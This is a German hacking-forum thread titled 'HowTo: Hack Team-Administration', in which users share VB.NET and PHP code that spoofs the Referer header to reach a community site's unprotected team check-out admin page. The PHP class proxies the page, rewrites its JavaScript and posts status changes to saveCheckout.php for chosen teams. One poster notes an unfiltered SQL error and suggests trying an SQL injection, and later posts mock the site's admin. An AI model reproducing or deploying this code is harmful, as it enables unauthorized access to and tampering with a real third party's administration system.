HowTo: Hack Team-Administration

**Diebspiel** · 25.10.2011, 13:42

Noch eine bessere Lösung in VB.NET (damit besucht man die Seite live, im Gegensatz zu anderen, wo man sie erst runterladen muss)

Code:

Dim a(0) As Byte
WebBrowser1.Navigate("http://knuddels-magdeburg.de/iphone/checkout/", "", a, "Referer: http://forum.knuddels.de/ubbthreads.php?ubb=showflat&Number=2150746" + Environment.NewLine)

- 1a

**Batzi** · 25.10.2011, 14:01

Habe gerade nochmals meine Klasse geupdatet. Der holt sich nun alle Javascripts und ändert einige Funktionen, damit auch das Speichern (Was über Ajax fungiert) richtig funzt.

Aber ich glaub, man hat dies bereits schon gemerkt ^^ Denn die XML-Struktur existiert nicht mehr. Der holt sich den Status online von einer XML (also "Abgemeldet", "inaktiv",..). Diese wurden anscheinend nun entfernt, dass man nimmer Speichern kann. Aber auch das kann man in 2 Minuten umgehen x'D

PHP-Code:


- REMOVE -

Edit:
LOL! Der Junge Filtert noch nichtmals die Daten x'D

You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '' at line 1

Vielleicht mal ne SQL-Injection starten x'D

Hier der neue Code (Speichern funzt nun auch):

PHP-Code:


<?php
    /*
        Team-Administration Class
        @Author        Batzi
        @Version    1.1
    */
    ob_start();
    
    class TeamCheckout {
        protected static $team            = "";
        protected static $referrer        = "";
        protected static $javascripts    = "";

        function setTeam($name) {
            self::$team = $name;
        }
        
        function output() {
            self::getForumLink();
            self::getAdministration();
            
            if(isset($_POST['save'])) {
                self::getPost();
            }
        }
        
        function getForumLink() {
            $html = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/");
            preg_match_all("/<a href='(.+)'>Forum<\/a>/Uis", $html, $data);
            self::$referrer = $data[1][0];
        }
        
        function getAdministration() {
            $html = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/");
            
            preg_match_all("/<script(.+)src="(.+)"><\/script>/Uis", $html, $data);
            for($i = 0; $i < count($data[2]); $i++) {
                self::addJavaScripts($data[2][$i]);
            }
            
            $html = preg_replace("/<script(.+)><\/script>/Uis", "", $html);
            $html = preg_replace("/<title>(.+)<\/title>/Uis", "<title>$1</title>" . self::getJavaScripts(), $html);
            
            $html = str_replace("id="selectStatus"", "name="selectStatus"", $html);
            $html = str_replace("id='inputStart'", "name='inputStart'", $html);
            $html = str_replace("id='inputEnd'", "name='inputEnd'", $html);
            $html = str_replace("id='inputReason'", "name='inputReason'", $html);
            $html = preg_replace("/<body(.+)>/Uis", "<body$1><form method="post" action="">", $html);
            $html = preg_replace("/<\/body>/Uis", "</form></body>", $html);

            print $html;
        }
        
        function addJavaScripts($name) {
            $data = self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/" . $name);
            $data = preg_replace("/\/\*(.*)\*\//Uis", "", $data);
            self::$javascripts .= $data;
        }
        
        function getJavaScripts() {
            self::$javascripts = str_replace("postDataReturnXml('saveCheckout.php', params, reload);", "postDataReturnXml('http://knuddels-magdeburg.de/" . self::$team . "/checkout/saveCheckout.php', params, reload);", self::$javascripts);
            self::$javascripts = str_replace("postDataReturnXml("getCheckoutStates.php", "", setCheckoutStates);", "postDataReturnXml("http://knuddels-magdeburg.de/" . self::$team . "/checkout/getCheckoutStates.php", "", setCheckoutStates);", self::$javascripts);
            self::$javascripts = str_replace("var checkoutStates = new Array();", "var checkoutStates = ['Angemeldet','Teilaktiv','Abgemeldet'];", self::$javascripts);
            
            self::$javascripts = preg_replace("/<a href='(.+)'>Speichern<\/a>/Uis", "<input type='hidden' name='nickId' value='" + nickId + "' /><input type='hidden' name='checkoutid' id='checkoutid' /><input type='submit' onclick='fuckoff(" + nickId + ");' name='save' value='Speichern' />", self::$javascripts);
            
            $html = "<script type="text/javascript" language="javascript">                        
                        " . self::$javascripts . "
                        
                        function fuckoff(nickId) {
                            var row = getRowOfNick(nickId);
                            document.getElementById('checkoutid').value = row.attributes.getNamedItem('checkoutid').value;
                        }
                    </script>";
            return $html;
        }
        
        function getRequest($site, $post = array()) {
            $socket = curl_init();
            curl_setopt($socket, CURLOPT_REFERER,            self::$referrer);
            curl_setopt($socket, CURLOPT_URL,                $site);
            curl_setopt($socket, CURLOPT_RETURNTRANSFER,    1);
            
            if(count($post) != 0) {
                curl_setopt($socket, CURLOPT_POST,            1);
                curl_setopt($socket, CURLOPT_POSTFIELDS,    $post);
            }
            
            return curl_exec($socket);
            curl_close($socket);
        }
        
        function getPost() {
            $data = array(
                "nickid"         => $_POST['nickId'],
                "checkoutid"     => $_POST['checkoutid'],
                "status"        => $_POST['selectStatus'],
                "start"            => $_POST['inputStart'],
                "end"            => $_POST['inputEnd'],
                "reason"        => $_POST['inputReason']
            );
            self::getRequest("http://knuddels-magdeburg.de/" . self::$team . "/checkout/saveCheckout.php", $data);
            header("Location: " . basename($_SERVER['PHP_SELF']));
        }
    }
    
    header("Content-Type: text/html; charset=UTF-8");
    
    /* How to Use: */
    $team = new TeamCheckout;
    /*
        Gültige Teams:
            bugs
            smileywars
            iphone
            foto
    */
    $team->setTeam("foto");
    $team->output();
?>

Sind abewr einige Fleißig ich Zitiere:

Ich mag Schwänze

xD
__________________
So wies ausschaut brauchen alle Teams mal aktivere Team-Mitglieder

**Batzi** · 27.10.2011, 18:23

Sehr schade :-D

wolltihrmichverarschen hats bemerkt und die Administration geloescht (Hoechstwahrscheinlich hat er dit verschoben).

**Diebspiel** · 27.10.2011, 18:29

wolltihrmichverarschen ist ein Lowbob, hab mehrere Logs von seinen Äußerungen diesbezüglich geschickt bekommen. Copy & Pasted alles aus Google und wundert sich, wenn auf einmal eine Injection möglich ist. Naja egal. Wenn er das wirklich nur renamed hat, haben wir eventuell bald wieder den neuen Link, weils doch die ein oder andere Kontaktperson aus den oben angegebenen Teams hier gibt, mal sehen. Denke nicht, es ist gefixxt, bzw. noch nicht oder ob er überhaupt in der Lage dazu ist.

Grüße

U-Labs

Account-Boerse

U-IMG

Thema: HowTo: Hack Team-Administration